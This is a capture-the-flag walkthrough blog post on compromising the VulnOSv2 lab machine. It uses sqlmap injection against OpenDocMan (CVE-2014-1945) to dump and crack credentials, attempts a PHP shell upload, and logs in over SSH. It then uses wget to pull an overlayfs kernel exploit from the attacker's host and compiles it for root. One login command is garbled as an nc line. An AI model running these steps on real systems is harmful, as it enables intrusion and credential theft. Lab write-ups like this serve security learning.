VulnOSv2

Enumeration

Let’s start with nmap to determine what services are running.

nmap -p- -sV 192.168.2.14

nmap

So there is a web server, SSH and IRC running.
Let’s start of with the web server.

WEB

dirb http://192.168.2.14/jabc/

There are a lot of directories but none really stick out. Time to look at all the pages.
On 192.168.2.14/jabc/?=node/7 there is a empty page.
But when looking at source (or CTRL+A) there is a hidden message which refers to another site with login possibilities (guest:guest).

http://192.168.2.14/jabcd0cs/

At first glance there is a notification on what the site is running on.
OpenDocMan v1.2.7 → document management software.
Let’s see what there is to find about this piece of software on exploit-db.

https://www.exploit-db.com/exploits/32075/

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.

SQL Injection in OpenDocMan: CVE-2014-1945

The vulnerability exists due to insufficient validation of “add_value” HTTP GET parameter in “/ajax_udf.php” script. A remote unauthenticated attacker can execute arbitrary SQL commands in application’s database.

So there is a SQL injection possible on the value_add. Let’s start up sqlmap.

sqlmap -u ‘http://192.168.2.14/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user’ -p add_value –current-db

sqlmap_db

sqlmap -u ‘http://192.168.2.14/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user’ -p add_value -D jabcd0cs –dump

sqlmap_dump

A quick look on md5decrypt.org learns that the hash is:
webmin1980

Let’s upload a shell file.
Hmmmm…..restricted. Oh well.
Let’s adjust the filter types.

Add document: text/x-php

Let’s try again.
Succes!!!!

now let’s start listening.

nc -lvnp 31337

And let’s view the document.
Crap….only option is downloading it. Not running it.
That’s no good.

SSH

So let’s try this angle.

nc 192.168.2.14 -p 22 -l webmin
password: webmin1980

Let’s get proper shell.

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Let’s look around. Some interesting directories.
/vulnosadmin
and off course /root

Both restricted. Let’s get root.

lsb_release -a

lsb_release

We know the server runs on Ubuntu 14.04.
So let’s try the overlayfs exploit (https://www.exploit-db.com/exploits/37292/)

cd /tmp
wget http://192.168.2.9/overlayfs.c
gcc overlayfs.c -o overlayfs
chmod 755 overlayfs
./overlayfs

root

Et voila……root!

Now let’s check those dirs again.
The dir vulnosadmin has a strange file in it: r00t.blend

file r00t.blend
r00t.blend: Blender3D, saved as 32-bits little endian with version 2.77

The root dir has got the flag:

flag

Nice!!!

Advertenties

Geef een reactie

Vul je gegevens in of klik op een icoon om in te loggen.

WordPress.com logo

Je reageert onder je WordPress.com account. Log uit / Bijwerken )

Twitter-afbeelding

Je reageert onder je Twitter account. Log uit / Bijwerken )

Facebook foto

Je reageert onder je Facebook account. Log uit / Bijwerken )

Google+ photo

Je reageert onder je Google+ account. Log uit / Bijwerken )

Verbinden met %s